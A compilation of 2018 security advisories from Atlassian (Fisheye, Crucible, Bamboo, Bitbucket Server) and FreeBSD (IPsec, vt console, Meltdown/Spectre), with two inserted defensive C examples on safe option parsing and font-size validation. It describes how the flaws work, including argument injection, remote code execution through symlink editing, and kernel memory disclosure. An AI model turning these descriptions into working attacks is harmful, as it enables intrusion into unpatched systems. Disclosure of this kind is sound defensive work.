Fisheye and Crucible did not correctly check if a configured Mercurial repository URI contained values that the Windows operating system may consider argument parameters. An attacker who has permission to add a repository in Fisheye or Crucible can execute code of their choice on systems that run a vulnerable version of Fisheye or Crucible on the Windows operating system. Versions of Fisheye and Crucible before 4.4.6 (the fixed version for 4.4.x) and from 4.5.0 before 4.5.3 (the fixed version for 4.5.x) running on the Windows operating system are affected by this vulnerability.

This issue can be tracked at: https://jira.atlassian.com/browse/FE-7014 .

Fix:
To address this issue, we've released the following versions containing a fix:
* Fisheye version 4.4.6
* Fisheye version 4.5.3
* Crucible version 4.4.6
* Crucible version 4.5.3

Remediation:
Upgrade Fisheye and Crucible to version 4.5.3 or higher.

The vulnerabilities and fix versions are described above. If affected, you should upgrade to the latest version immediately. If you are running Fisheye or Crucible 4.4.x and cannot upgrade to 4.5.3, upgrade to version 4.4.6.

For a full description of the latest version of Fisheye, see the release notes found at https://confluence.atlassian.com/display/FISHEYE/Fisheye+releases. You can download the latest version of Fisheye from the download centre found at https://www.atlassian.com/software/fisheye/download.

For a full description of the latest version of Crucible, see the release notes found at https://confluence.atlassian.com/display/CRUCIBLE/Crucible+releases. You can download the latest version of Crucible from the download centre found at https://www.atlassian.com/software/crucible/download.

Support:
If you have questions or concerns regarding this advisory, please raise a support request at https://support.atlassian.com/.
Advisory - Bamboo - CVE-2018-5224
This email refers to the advisory found at https://confluence.atlassian.com/x/PS9sO .

CVE ID:
* CVE-2018-5224.

Product: Bamboo.

Affected Bamboo product versions:
2.7.0 <= version < 6.3.3
6.4.0 <= version < 6.4.1

Fixed Bamboo product versions:
* for 6.3.x, Bamboo 6.3.3 has been released with a fix for this issue.
* for 6.4.x, Bamboo 6.4.1 has been released with a fix for this issue.

Summary:
This advisory discloses a critical severity security vulnerability. Versions of Bamboo starting with 2.7.0 before 6.3.3 (the fixed version for 6.3.x) and from version 6.4.0 before 6.4.1 (the fixed version for 6.4.x) running on the Windows operating system are affected by this vulnerability.

Customers who have upgraded Bamboo to version 6.3.3 or 6.4.1 are not affected.

Customers who have downloaded and installed Bamboo >= 2.7.0 but less than 6.3.3 (the fixed version for 6.3.x) or who have downloaded and installed Bamboo >= 6.4.0 but less than 6.4.1 (the fixed version for 6.4.x) please upgrade your Bamboo installations immediately to fix this vulnerability.

Argument injection through Mercurial repository uri handling on Windows (CVE-2018-5224)

Severity:
Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low.

This is our assessment and you should evaluate its applicability to your own IT environment.

Description:
Bamboo did not correctly check if a configured Mercurial repository URI contained values that the Windows operating system may consider argument parameters. An attacker who has permission to create a repository in Bamboo, edit an existing plan in Bamboo that has a non-linked Mercurial repository, or create a plan in Bamboo either globally or in a project using Bamboo Specs can execute code of their choice on systems that run a vulnerable version of Bamboo on the Windows operating system. Versions of Bamboo starting with 2.7.0 before 6.3.3 (the fixed version for 6.3.x) and from version 6.4.0 before 6.4.1 (the fixed version for 6.4.x) running on the Windows operating system are affected by this vulnerability.

This issue can be tracked at: https://jira.atlassian.com/browse/BAM-19743 .

Fix:
To address this issue, we've released the following versions containing a fix:
* Bamboo version 6.3.3
* Bamboo version 6.4.1

Remediation:
Upgrade Bamboo to version 6.4.1 or higher.

The vulnerabilities and fix versions are described above. If affected, you should upgrade to the latest version immediately. If you are running Bamboo 6.3.x and cannot upgrade to 6.4.1, upgrade to version 6.3.3.

For a full description of the latest version of Bamboo, see the release notes found at https://confluence.atlassian.com/display/BAMBOO/Bamboo+releases. You can download the latest version of Bamboo from the download centre found at https://www.atlassian.com/software/bamboo/download.

Support:
If you have questions or concerns regarding this advisory, please raise a support request at https://support.atlassian.com/.
FreeBSD Security Advisory FreeBSD-SA-18:05.ipsec
=============================================================================
FreeBSD-SA-18:05.ipsec                                        Security Advisory
                                                          The FreeBSD Project

Topic:          ipsec crash or denial of service

Category:       core
Module:         ipsec
Announced:      2018-04-04
Credits:        Maxime Villard
Affects:        All supported versions of FreeBSD.
Corrected:      2018-01-31 09:24:48 UTC (stable/11, 11.1-STABLE)
                2018-04-04 05:37:52 UTC (releng/11.1, 11.1-RELEASE-p9)
                2018-01-31 09:26:28 UTC (stable/10, 10.4-STABLE)
                2018-04-04 05:37:52 UTC (releng/10.4, 10.4-RELEASE-p8)
                2018-04-04 05:37:52 UTC (releng/10.3, 10.3-RELEASE-p29)
CVE Name:       CVE-2018-6918

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

The IPsec suite of protocols provides network level security for IPv4 and
IPv6 packets. FreeBSD includes software originally developed by the KAME
project which implements the various protocols that make up IPsec.

In IPsec, the IP Authentication Header (AH) is used to provide protection
against replay attacks and connectionless integrity and data origin
authentication for IP datagrams.

II.  Problem Description

The length field of the option header does not count the size of the option
header itself. This causes a problem when the length is zero: the offset is
then incremented by zero, which causes an infinite loop.

In addition there are pointer/offset mistakes in the handling of IPv4
options.

III. Impact

A remote attacker who is able to send an arbitrary packet could cause the
remote target machine to crash.

IV.  Workaround

No workaround is available. Note that in FreeBSD 10 IPsec is not included in
the kernel by default, but it is in FreeBSD 11.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Afterward, reboot the system.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterward, reboot the system.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-18:05/ipsec.patch
# fetch https://security.FreeBSD.org/patches/SA-18:05/ipsec.patch.asc
# gpg --verify ipsec.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/10/                                                        r328621
releng/10.3/                                                      r331985
releng/10.4/                                                      r331985
stable/11/                                                        r328620
releng/11.1/                                                      r331985
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a machine
with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6918>

The latest revision of this advisory is available at
<https://security.FreeBSD.org/advisories/FreeBSD-SA-18:05.ipsec.asc>
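The Problem Description above comes down to how far an option walker advances per option. The following is an added example, not FreeBSD or KAME code, assuming the option header in question uses the IPv6 Hop-by-Hop/Destination option format (whose Opt Data Len excludes the two header octets, exactly the property the advisory describes); it walks a constructed option area the way AH input processing must when it looks for mutable options, advancing by 2 + optlen and bounds-checking each step, and goes beyond the single zero-length case by handling Pad1 and truncated options too.

```c
/* Added example (not FreeBSD code): walking IPv6 extension-header options
 * with the advance computed from the option header size plus its data. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#define IP6OPT_PAD1      0x00   /* single-byte option, no length octet */
#define IP6OPT_MUTABLE   0x20   /* "change en route" bit in the type octet */

/* Constructed sample option areas (not captured traffic). */
const uint8_t sample_opts[] = {
    0x00,                   /* Pad1 */
    0x01, 0x00,             /* PadN, Opt Data Len = 0 (the hang trigger) */
    0x05, 0x02, 0x00, 0x00, /* Router Alert, Opt Data Len = 2 */
    0x3e, 0x01, 0xaa        /* mutable option (bit 0x20 set), 1 data byte */
};
const uint8_t sample_zero_len[]  = { 0x01, 0x00 };       /* lone PadN, len 0 */
const uint8_t sample_truncated[] = { 0x05, 0x02, 0x00 }; /* claims 2, has 1 */

/* Returns the number of options found and stores the number of mutable
 * options in *mutable_out; returns -1 if an option runs past the area. */
int walk_ip6_options(const uint8_t *opts, size_t len, int *mutable_out)
{
    size_t off = 0;
    int nopts = 0, nmutable = 0;

    while (off < len) {
        uint8_t type = opts[off];

        if (type == IP6OPT_PAD1) {   /* Pad1 carries no length octet */
            off += 1;
            nopts++;
            continue;
        }
        if (off + 2 > len)           /* need both type and length octets */
            return -1;
        uint8_t optlen = opts[off + 1];
        if (off + 2 + optlen > len)  /* option data must fit in the area */
            return -1;
        if (type & IP6OPT_MUTABLE)
            nmutable++;
        nopts++;
        /* Opt Data Len excludes the two header octets. The vulnerable code
         * advanced by optlen alone, so a zero-length option left off
         * unchanged and the loop never terminated. */
        off += 2 + optlen;
    }
    *mutable_out = nmutable;
    return nopts;
}

int count_ip6_options(const uint8_t *opts, size_t len)
{
    int m = 0;
    return walk_ip6_options(opts, len, &m);
}

int count_mutable_ip6_options(const uint8_t *opts, size_t len)
{
    int m = 0;
    return walk_ip6_options(opts, len, &m) < 0 ? -1 : m;
}

int main(void)
{
    printf("options=%d mutable=%d truncated=%d\n",
           count_ip6_options(sample_opts, sizeof sample_opts),
           count_mutable_ip6_options(sample_opts, sizeof sample_opts),
           count_ip6_options(sample_truncated, sizeof sample_truncated));
    return 0;
}
```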
FreeBSD Security Advisory FreeBSD-SA-18:04.vt
=============================================================================
FreeBSD-SA-18:04.vt                                           Security Advisory
                                                          The FreeBSD Project

Topic:          vt console memory disclosure

Category:       core
Module:         vt console
Announced:      2018-04-04
Credits:        Dr Silvio Cesare of InfoSect
Affects:        All supported versions of FreeBSD.
Corrected:      2018-04-04 05:24:59 UTC (stable/11, 11.1-STABLE)
                2018-04-04 05:33:56 UTC (releng/11.1, 11.1-RELEASE-p9)
                2018-04-04 05:26:33 UTC (stable/10, 10.4-STABLE)
                2018-04-04 05:33:56 UTC (releng/10.4, 10.4-RELEASE-p8)
                2018-04-04 05:33:56 UTC (releng/10.3, 10.3-RELEASE-p29)
CVE Name:       CVE-2018-6917

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

On FreeBSD 11 and later, and FreeBSD 10.x systems that boot via UEFI, the
default system video console is provided by the vt(4) driver. The console
allows the user, including an unprivileged user, to load a font at runtime.

II.  Problem Description

Insufficient validation of user-provided font parameters can result in an
integer overflow, leading to the use of arbitrary kernel memory as glyph
data. Characters that reference this data can be displayed on the screen,
effectively disclosing kernel memory.

III. Impact

Unprivileged users may be able to access privileged kernel data. Such memory
might contain sensitive information, such as portions of the file cache or
terminal buffers. This information might be directly useful, or it might be
leveraged to obtain elevated privileges in some way; for example, a terminal
buffer might include a user-entered password.

IV.  Workaround

The syscons sc(4) system console is not affected by this issue and may be
used on systems that do not boot via UEFI. To use the syscons console, set
the kern.vty tunable in /boot/loader.conf as described in sc(4), and reboot.

No workaround is available for systems that boot via UEFI.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

A reboot is required after the upgrade.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-18:04/vt.patch
# fetch https://security.FreeBSD.org/patches/SA-18:04/vt.patch.asc
# gpg --verify vt.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/10/                                                        r331983
releng/10.3/                                                      r331984
releng/10.4/                                                      r331984
stable/11/                                                        r331982
releng/11.1/                                                      r331984
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a machine
with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6917>

The latest revision of this advisory is available at
<https://security.FreeBSD.org/advisories/FreeBSD-SA-18:04.vt.asc>
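The Problem Description above is the classic shape of a size-computation overflow: a product of user-controlled font parameters wraps, a too-small buffer passes the check, and the glyph lookup then reads past it. The following is an added example, not FreeBSD's vt(4) code; the header layout, error codes and 1 MiB cap are assumptions for illustration, and the arithmetic is done in 32 bits on purpose so the overflow case is reachable.

```c
/* Added example (not FreeBSD's vt(4) code): validating user-supplied font
 * parameters with overflow-checked arithmetic before the claimed size is
 * used to locate glyph data. Header layout, error codes and the 1 MiB cap
 * are assumptions for illustration. */
#include <stdint.h>
#include <stdio.h>

#define FONT_MAX_BYTES (1u << 20)    /* assumed upper bound on glyph data */

enum { FONT_OK = 0, FONT_ERR_ZERO = -1, FONT_ERR_OVERFLOW = -2,
       FONT_ERR_TOOBIG = -3 };

struct font_hdr {                    /* hypothetical header layout */
    uint8_t  width;                  /* glyph width in pixels */
    uint8_t  height;                 /* glyph height in pixels */
    uint32_t glyph_count;            /* number of glyph bitmaps supplied */
};

/* Constructed sample headers (not real font files). */
const struct font_hdr font_ok       = { 8, 16, 256 };     /* 16 B * 256 = 4096 B */
const struct font_hdr font_zero     = { 0, 16, 256 };     /* zero-width glyphs */
const struct font_hdr font_overflow = { 255, 255, 600000 }; /* 8160 B * 600000 wraps */
const struct font_hdr font_toobig   = { 8, 16, 100000 };  /* 1.6 MB exceeds cap */

/* Bytes of bitmap data the header claims, computed in the 32-bit width a
 * driver would use. The unsafe form is simply
 *     total = stride * height * glyph_count;
 * which can wrap to a small value that passes a bounds check while glyphs
 * are still indexed with the unwrapped parameters, so lookups read whatever
 * kernel memory follows the font buffer. */
int font_data_size(const struct font_hdr *h, uint32_t *out)
{
    uint32_t stride, per_glyph, total;

    if (h->width == 0 || h->height == 0 || h->glyph_count == 0)
        return FONT_ERR_ZERO;
    stride = ((uint32_t)h->width + 7) / 8;             /* bytes per glyph row */
    if (__builtin_mul_overflow(stride, (uint32_t)h->height, &per_glyph))
        return FONT_ERR_OVERFLOW;
    if (__builtin_mul_overflow(per_glyph, h->glyph_count, &total))
        return FONT_ERR_OVERFLOW;
    if (total > FONT_MAX_BYTES)
        return FONT_ERR_TOOBIG;
    *out = total;
    return FONT_OK;
}

/* Result code only, for callers that just need accept/reject. */
int font_check(const struct font_hdr *h)
{
    uint32_t n = 0;
    return font_data_size(h, &n);
}

/* Size on success, 0 on any rejection. */
uint32_t font_data_size_or_zero(const struct font_hdr *h)
{
    uint32_t n = 0;
    return font_data_size(h, &n) == FONT_OK ? n : 0;
}

/* A character-to-glyph map entry must not point past the glyphs supplied;
 * an unchecked index would read glyph data from outside the font buffer. */
int glyph_index_ok(const struct font_hdr *h, uint32_t glyph_index)
{
    return glyph_index < h->glyph_count;
}

int main(void)
{
    printf("ok=%u overflow_rc=%d toobig_rc=%d\n",
           (unsigned)font_data_size_or_zero(&font_ok),
           font_check(&font_overflow), font_check(&font_toobig));
    return 0;
}
```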
Advisory - Bitbucket Server - CVE-2018-5225
This email refers to the advisory found at https://confluence.atlassian.com/x/3WNsO

CVE ID:
CVE-2018-5225

Products: Bitbucket Server

Affected Bitbucket Server Versions:
4.13.0 <= version < 5.4.8
5.5.0 <= version < 5.5.8
5.6.0 <= version < 5.6.5
5.7.0 <= version < 5.7.3
5.8.0 <= version < 5.8.2

Fixed Bitbucket Server Versions:
5.4.8
5.5.8
5.6.5
5.7.3
5.8.2
5.9.0

Summary:
This advisory discloses a critical severity security vulnerability which was introduced in version 4.13.0 of Bitbucket Server. All versions of Bitbucket Server before 5.4.8 (the fixed version for 4.13.0 through to 5.4.7), 5.5.0 before 5.5.8 (the fixed version for 5.5.x), 5.6.0 before 5.6.5 (the fixed version for 5.6.x), 5.7.0 before 5.7.3 (the fixed version for 5.7.x), and 5.8.0 before 5.8.2 (the fixed version for 5.8.x) are affected by this vulnerability. Bitbucket Server 5.9.0 is not impacted by this vulnerability.

Customers who have upgraded Bitbucket Server to version 5.4.8, 5.5.8, 5.6.5, 5.7.3, 5.8.2 or 5.9.0 are not affected.

Customers who have downloaded and installed Bitbucket Server >= 4.13.0 less than 5.4.8 (the fixed version for 4.13.0 through to 5.4.7), Bitbucket Server >= 5.5.0 less than 5.5.8 (the fixed version for 5.5.x), Bitbucket Server >= 5.6.0 less than 5.6.5 (the fixed version for 5.6.x), Bitbucket Server >= 5.7.0 less than 5.7.3 (the fixed version for 5.7.x), or Bitbucket Server >= 5.8.0 less than 5.8.2 (the fixed version for 5.8.x) should upgrade their Bitbucket Server installations immediately to fix this vulnerability.

Remote Code Execution via In Browser Editing - CVE-2018-5225

Severity:
Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low.

This is our assessment and you should evaluate its applicability to your own IT environment.

Description:
An authenticated user of Bitbucket Server could gain remote code execution using the in-browser editing feature via editing a symbolic link within a repository.

All versions of Bitbucket Server before 5.4.8 (the fixed version for 4.13.0 through to 5.4.7), 5.5.0 before 5.5.8 (the fixed version for 5.5.x), 5.6.0 before 5.6.5 (the fixed version for 5.6.x), 5.7.0 before 5.7.3 (the fixed version for 5.7.x), and 5.8.0 before 5.8.2 (the fixed version for 5.8.x) are affected by this vulnerability. Bitbucket Server 5.9.0 is not impacted by this vulnerability.

This issue can be tracked here:

Fix:
We have taken the following steps to address this issue:
* Released Bitbucket Server version 5.9.0 that contains a fix for this issue and can be downloaded from https://www.atlassian.com/software/bitbucket/download.
* Released Bitbucket Server version 5.8.2 that contains a fix for this issue and can be downloaded from https://www.atlassian.com/software/bitbucket/download-archives.
* Released Bitbucket Server version 5.7.3 that contains a fix for this issue and can be downloaded from https://www.atlassian.com/software/bitbucket/download-archives.
* Released Bitbucket Server version 5.6.5 that contains a fix for this issue and can be downloaded from https://www.atlassian.com/software/bitbucket/download-archives.
* Released Bitbucket Server version 5.5.8 that contains a fix for this issue and can be downloaded from https://www.atlassian.com/software/bitbucket/download-archives.
* Released Bitbucket Server version 5.4.8 that contains a fix for this issue and can be downloaded from https://www.atlassian.com/software/bitbucket/download-archives.

What You Need to Do:
Atlassian recommends that you upgrade to the latest version. For a full description of the latest version of Bitbucket Server, see the release notes. You can download the latest version of Bitbucket Server from the download centre.

Mitigation:
If you are running an affected version of Bitbucket Server and cannot upgrade to an unaffected version, the following mitigation can be performed:
* Set feature.file.editor=false in the bitbucket.properties file
* Restart Bitbucket Server for changes to become effective

Please note that this mitigation does not mitigate against vulnerabilities where third party plugins use the file editing API programmatically.

Support:
If you did not receive an email for this advisory and you wish to receive such emails in the future go to https://my.atlassian.com/email and subscribe to the Alerts emails.

If you have questions or concerns regarding this advisory, please raise a support request at https://support.atlassian.com/.

References:
Security Bug fix Policy
As per our new policy critical security bug fixes will be back ported in accordance with https://www.atlassian.com/trust/security/bug-fix-policy. We will release new bug fix releases for the versions covered by the new policy instead of binary patches. Binary patches are no
FreeBSD Security Advisory FreeBSD-SA-18:03.speculative_execution
=============================================================================
FreeBSD-SA-18:03.speculative_execution                        Security Advisory
                                                          The FreeBSD Project

Topic:          Speculative Execution Vulnerabilities

Category:       core
Module:         kernel
Announced:      2018-03-14
Credits:        Jann Horn (Google Project Zero); Werner Haas, Thomas
                Prescher (Cyberus Technology); Daniel Gruss, Moritz Lipp,
                Stefan Mangard, Michael Schwarz (Graz University of
                Technology); Paul Kocher; Daniel Genkin (University of
                Pennsylvania and University of Maryland), Mike Hamburg
                (Rambus); Yuval Yarom (University of Adelaide and Data61)
Affects:        All supported versions of FreeBSD.
Corrected:      2018-02-17 18:00:01 UTC (stable/11, 11.1-STABLE)
                2018-03-14 04:00:00 UTC (releng/11.1, 11.1-RELEASE-p8)
CVE Name:       CVE-2017-5715, CVE-2017-5754

Special Note:   Speculative execution vulnerability mitigation is a work
                in progress. This advisory addresses the most significant
                issues for FreeBSD 11.1 on amd64 CPUs. We expect to update
                this advisory to include 10.x for amd64 CPUs. Future
                FreeBSD releases will address this issue on i386 and other
                CPUs. freebsd-update will include changes on i386 as part
                of this update due to common code changes shared between
                amd64 and i386, however it contains no functional changes
                for i386 (in particular, it does not mitigate the issue on
                i386).

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

Many modern processors have implementation issues that allow unprivileged
attackers to bypass user-kernel or inter-process memory access restrictions
by exploiting speculative execution and shared resources (for example,
caches).

II.  Problem Description

A number of issues relating to speculative execution were found last year
and publicly announced January 3rd. Two of these, known as Meltdown and
Spectre V2, are addressed here.

CVE-2017-5754 (Meltdown)
------------------------

This issue relies on an affected CPU speculatively executing instructions
beyond a faulting instruction. When this happens, changes to architectural
state are not committed, but observable changes may be left in
micro-architectural state (for example, cache). This may be used to infer
privileged data.

CVE-2017-5715 (Spectre V2)
--------------------------

Spectre V2 uses branch target injection to speculatively execute kernel code
at an address under the control of an attacker.

III. Impact

An attacker may be able to read secret data from the kernel or from a
process when executing untrusted code (for example, in a web browser).

IV.  Workaround

No workaround is available.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date, and
reboot.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility, followed by a
reboot into the new kernel:

# freebsd-update fetch
# freebsd-update install
# shutdown -r now

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 11.1]
# fetch https://security.FreeBSD.org/patches/SA-18:03/speculative_execution-amd64-11.patch
# fetch https://security.FreeBSD.org/patches/SA-18:03/speculative_execution-amd64-11.patch.asc
# gpg --verify speculative_execution-amd64-11.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

CVE-2017-5754 (Meltdown)
------------------------

The mitigation is known as Page Table Isolation (PTI). PTI largely separates
kernel and user mode page tables, so that even during speculative execution
most of the kernel's data is unmapped and not accessible.

A demonstration of the Meltdown vulnerability is available at
https://github.com/dag-erling/meltdown. A positive result is definitive
(that is, the vulnerability exists with certainty). A negative result
indicates either that the CPU is not affected, or that the test is not
capable of demonstrating the is